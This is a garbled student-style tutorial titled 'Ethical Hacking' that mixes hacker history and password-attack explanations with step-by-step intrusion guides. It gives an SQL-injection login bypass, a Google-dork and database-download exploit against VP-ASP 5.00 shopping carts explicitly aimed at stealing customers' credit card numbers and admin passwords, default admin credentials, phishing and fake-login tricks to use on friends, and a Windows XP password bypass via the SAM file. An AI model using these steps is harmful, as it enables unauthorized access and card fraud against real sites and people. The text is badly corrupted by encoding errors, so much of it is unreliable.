ETHICAL HACKING

MALLAMPATI.KUSUMA. CSE.

Introduction to Hacking!
"Hacking" is the word that shakes everyone whenever it is said or heard by someone. Everyone born in this world with attitude wants to be a Hacker. But it is not a job of a new born baby or an old grown lady. A Hacker needs a brilliant mind to hack anything. His skills should be so powerful that no other hacker can hack him. A Hacker doesn't need a software to hack. here are many rules that he should learn to become an Ethical Hacker. hese rules include knowledge of H !"# $ava%cripts# &omputer ricks# &racking ' Breaking etc.etc.

History of Hack rs!

(evin !itnick# often incorrectly called by many )od of hackers# broke into the computer systems of the *orld's top technology and telecommunications companies +okia# ,ujitsu# !otorola# and %un !icro systems. He was arrested by the ,B- in .//0# but later released on parole in 1222. He never termed his activity hacking# instead he called it social engineering. +ovember 1221 Englishman )ary !c(innon was arrested in +ovember 1221 following an accusation that he hacked into more than /2 3% military computer systems in the 3(. He is currently undergoing trial in a British court for a fast4track e5tradition to the 3% where he is a *anted man. he ne5t hearing in the case is slated for today.

Hacking M t!ods!

Phising Method- 6hising is the method that you are familiar with. 7ou create a
,ake Account and -8 in yahoo and fool your friends by telling them to send the victim's -8# their own -8 and their own 6assword in your ,ake 7ahoo Account.

Brute Force Hack- Brute ,orce Hack is a Hacking which takes much time to get
6assword of the 9ictim and it needs a Hacker to learn about $ava%cripts and all the non4sense.

Fake Login Hack- ,ake "ogin Hack is the Hacking used by most of you for your
goal by creating a ,ake "ogin 6age and telling your friends to login there and the 6assword would come to you.

Cookie Steal Hack- &ookie %teal Hack is somewhat similar to ,ake "ogin Hack
as you prepare a &ookie %tealer and tell your friends to open your &ookie so that his 6assword would come to you.

Web Mail Hack- *eb !ail Hack is the toughest method to learn for Hacking as it
also needs a Hacker to learn about $ava%cripts# &omputer ricks and much more and ther is also a software for this type of Hack.

Ty" s of Hack rs!

White Hat Hacker- Also referred as Ethical Hacker or sometimes

called as %neakers. A *hite Hat Hacker mainly focuses on securing corporate +etwork from outsider threat. hey are with good intention who fight against Black Hat.

hey are %killed Hacker who sometimes act legally and sometime not. -n simple word you may call a )rey Hat hacker as Hybrid between *hite Hat and Black Hat hacker

Grey Hat Hacker-

Black Hat Hacker- Also referred as &racker. A Black Hat Hacker's

intention is to break into others +etwork# and wish to secure his own machine. hey often uses different techni:ues for breaking into systems which can involve advanced programming skills and social engineering. HACKING #ITH ETHICS!!! HACKING #E$SITES
-f you posess the H !" ' $A9A knowledge then u can even acess password protected websites. o hack a 6assword 6rotected *ebsites just follow these steps; 4 < =pen the website u want to hack. 6rovide wrong username4password. >e.g ; 3sername 4 me and 6assword 4 ' or .?. 44@ An error occured saying wrong username4password. +ow be prepared ur work starts from here... < Aight click anywhere on that page ?BB go to view source. < here u can see the html codings with javascripts. < Before this login information copy the url of the site in which you are. < hen delete the java script from the above that validates ur informaiton in the server.>8o this very carefully# ur success to

hack the site depends upon this i.e how efficiently u delete the $avascripts that validate ur account information@

then look for...code ..; input name?"password" type?"password" ?B replace there instead of . %ee there if ma5length of password is less than .. then increase it to .. >e.g ; if then write < $ust go to file ?B save as and save it any where within the hardisk with e5t.html>e.g ;c;hack.htm@ < &lose ur webpage and go to the webpage u save in your harddisk>e.g ; c;hack.htm@ =pen it. < 3 see that some changes in current page as compared to original =ne. 8on't worry. < 6rovide any usernameCe.g;hackerD and passwordCe.g;' or .?. 44D &ongratsE3 hav cracked the above website and entered into the account of -st user saved in the server's database.

L%CALL& ST%'E( PASS#%'(S !ost browsers# including -nternet E5plorerF and +etscapeF# the A="F client# and *indowsF 8ial43p &onnections allow you the option to store passwords. hese passwords are stored on the local machine and >depending upon where and how it is stored@ there is usually a method of recovering these passwords. %toring any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. *hile we are not currently aware of any program to recover locally stored A="F passwords# we do not recommend that these are secure. %oftware does e5ist that can recover most of the other types of locally stored passwords. T'%)AN A rojan is a program that is sent to a user that allows an attacker to control functions of the target computer# recover information from the target or to delete or damage files on the target. he name rojan is given because the program will usually come attached to some other program or file that entices you to run it. here are a wide variety of rojans any number of which can be programmed to capture passwords as they are typed and to email or transmit them to a third party. o protect yourself against rojans# you should never e5ecute or download software or files that are not from a trusted source. -t is critical that anyone working on internet use a virus protection program >which should catch most rojans.@ +ote that since a rojan re:uires the password to be typed or stored in order to be recovered# this is not an effective way to recover your own password. -t could e5plain# however# how someone could lose their password to a hacker. %ending someone a rojan program is certainly illegal and we do not recommend or condone this activity. A rojan is unlikely to be effective in recovering a particular account password since it re:uires the target to install it. However# hackers will often bulk mail rojans to thousands of people in the hope that a small percentage will get caught.

"egitimate account holders who may have been caught by a rojan and can authenticate themselves should contact their service provider to have their account passwords reset. KE&L%GGE' A keylogger is a program or piece of hardware that records all keyboard keystrokes to an encrypted file which can then be read later. Based on the order of the keystrokes# it is usually easy to identify the password>s@ from the file later. "ike the rojan# this also re:uires that someone actually type the password. (eyloggers come in two types; hardware and software. A hardware keylogger can be fitted between the keyboard cable and the computer and can be activated with a few keystrokes. -t is then left in place until after the password that you are looking to recover is typed. "ater it is removed and the file of keystrokes is e5amined for the password. A hardware keylogger is undectable by anti4virus software. A software keylogger is installed on a system and effectively has the same function# however# it is a little bit more comple5 to use since it must be installed to run stealthily to be effective. A keylogger could be used to steal a password from someone who is using an office computer or sharing a computer. -t is possible that installing and using such a device or piece of software could be illegal depending upon whether the target has a presumption of privacy when using the computer on which the keylogger is installed. IMPE'S%NATI%N -t is possible to impersonate a program on a computer by launching windows that look like something else. ,or instance# letGs say you login to the !%+F service and visit a website >in this case a hostile website.@ -t would be possible for this website to pop4up some windows that look like something else. hey could look almost identical to windows that an ine5perienced user might e5pect from his local computer. he user could be fooled into submitting information to the hostile website. ,or instance# consider the effect of seeing the following series of windows; -f these could trick you into entering your password# then you could end4up sending your password to the attacker. *indows such as these could be created to mirror virtually any program or series of actions. 7our browser will likely identify your operating system and your -6 address might identify your -%6. herefore# a hostile website could target you with a series of screen shots that look e5actly as they should on your system. he key is that the screen shots are not coming from your system# but are coming from the hostile website. ,irst# creating such a hostile website is probably fraudulent and illegal. *e do not recommend or condone this activity. o protect yourself against this type of attack# make sure to configure your browser for high security and enable warnings for any code that is e5ecuted on your system. SNI**ING -f two people do not share the same computer# but do share the same network# it may be possible for one to sniff the othersG packets as they sign4on. he traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or Hplayed4back.I his is not a simple attack to e5ecute# but is possible if two people are close to one another and share a hub. Again# this is likely to be illegal and we do not condone this activity. S%CIAL ENGINEE'ING %ocial engineering is the name given to the art of attacking the person# rather than the computer or system. he basic principle is that many people can be talked into giving someone else their id and password if they think it is someone that they can trust. ,or instance# - might call someone and say - was from A=" and that - was finally getting around to responding to their technical support :uestion. - would then ask you to describe the problem that you are having and tell you that we have a solution. However# - just need to verify the account. &an you give me the

username and password againJ A surprising number of people would fall for this obvious scam. here is no limit as to how elaborate this can be. he more information that is given by the caller# the more realistic or believable the call is. Again# never give your password to anyone. +o legitimate customer service representative will ask for this information. hese are the basic methods that we are aware of for hacking an A="F# 7ahooF# HotmailF or any other dial4up or on4line password. Hopefully this will answer some :uestions and help you protect yourself against these attacks.

$asic n ds for !acking !!!

u learn about computers 4 in as much detail as you can4 now most people will disagree with this but the first thing you should do is learn H !" this way you will knowhow to make decent websites. you may wonder whyJ because hacking is knowing ecverything about a cpmputer an usingthat knowledge to get what you want. +ow after you have done this you can start on this list of things to do. Cod + .. "earn about hardware 4 basically how your computer works. 1. "earn about different types of software. K. "earn 8=%.>learn everything possible@ L. "earn how to make a few batch files. 0. 6ort scanning. > download blues port scanner if it's your first time@ M. "earn a few programming languages H !"#&NN#6ython#6erl.... >i'd recommend learning html as your first lang@ O. How to secure yourself >pro5y# hiding ip etc@ P. , 6 /. &6Q-p # 386 # 8H&6 # .2. )et your hands dirty with networking ... "earn dissembler language >its the most basic language for understanding machine language and very useful to understand when anything is disassembled and decoded@ .1. "earn to use a 3ni5 os. >a 3ni5 system is generally loaded with networking tools as well as a few hacking tools@ .K. "earn how to use E5ploits and compile them. >6erl and cNN is must@

SH%P A(MIN HACKING

his method is use for testing the knowledge or for getting the credit card for shopping on internet or for fun or any way but not for cashing > bcoR this method dont give 6-+ 4 L digit passcode @ only give cc numb # cvv1 and other basic info. %H=6A8!-+% AAE =, 8-,,EAE+ &=!6A+-E% "-(E ; 964A%6 # S &AA .. E & E &. ! 6=% -+) 3 =A-A" ,=A HA&(-+) 964A%6 %H=6. i hope u seen on internet whenever u try to buy some thing on internet with cc they show u a well programmed form very secure# they r carts .. like vp4asp 5carts .. specific sites are not hacked but carts are hack.. below i m posting tutorial to hack 96 A%6 cart. now every site which use that cart can be hacked and through their <mdb file u can get their clients ' credit card details ' and also login name and password of their admin area. and all other info of clients and comapny secrets. HEAE *E )= ... <4<4<4<4<4<4<4<4< ype; 964A%6 %hopping &art 9ersion; 0.22 How to find 964A%6 0.22 sites hmmm# )ood T. ,inding 964A%6 0.22 sites is so simple... )o to google.com and type. intitle; 964A%6 %hopping &art 0.22 7ou will find many websites with 964A%6 0.22 cart software installed +ow let's go to the e5ploit.. the page will be like this B <<<<;QQ<<<.victim.comQshopQshopdisplaycategories.asp he e5ploit is ; diagUdbtest.asp so do thisB <<<<;QQ<<<.victim.comQshopQdiagUdbtest.asp A page will appear contain those; 58atabase shopping.L2 58blocation res5 5databasetype5Email5Email+ame5Email%ubject5Email%ystem5Email ype5=rdernumber.;. ESA!6"E .;. the most important thing here is 58atabase 58atabase; shopping.L2 ok now the 3A" will be like this;

<<<<;QQ<<<.victim.comQshopQshopping.L2.mdb if you didn't download the 8atabase.. ry this while there is dblocation. 58blocation res5 the url will be; <<<<;QQ<<<.victim.comQshopQres5Qshopping.L2.mdb -f u see the error message you have to try this ; <<<<;QQ<<<.victim.comQshopQshopping022.mdb download the mdb file and you should be able to open it with any mdb file viewer# you should be able to find one at download.com =r use !% =ffice Access. inside you should be able to find credit card information. and you should even be able to find the admin username and password for the website. the admin login page is usually located here <<<<;QQ<<<.victim.comQshopQshopadmin.asp if you cannot find the admin username and password in the mdb file or you can but it is incorrect# or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are 3sername; admin password; admin =A 3sername; vpasp password; vpasp

Hacking #indo,s -P!

< Boot the PC in Saf Mod by pressing the *. key. < %elect the Saf Mod option# now you can now Login as an Ad/inistrator and -P won't prompt for the Pass,ord. < ry rebooting the PC in (%S. < +ow# Access to C+0#indo,s0syst /120config0SAM. < Aename SAM as SAM./3. < +ow -P won't ask for Pass,ord ne5t time you Login. < +ow# again go to Start / nu 445 'un. < ype there c/d "ro/"t. < ype n t us r 67 -t will list all the users. < Again type net user "administrator" or the name of the administrator 8na/ 8 6. < -t will ask for the password. ype the password and there you are done. < Hold the Ctr9:A9t key and press ( 9 twice. his will bring up the normal login and you can log on as Administrator. o unhide the Administrator account so it does show up. < Again go to Start 445 'un 445 r g dit. < )o to HKE&;L%CAL;MACHINE 445 S%*T#A'E 445 Microsoft 445 #indo,s NT 445 Curr nt< rsion 445 #in9ogon 445 S" cia9Accounts 445 Us rList. < 3nhide the Ad/inistrator key by giving it a value of =.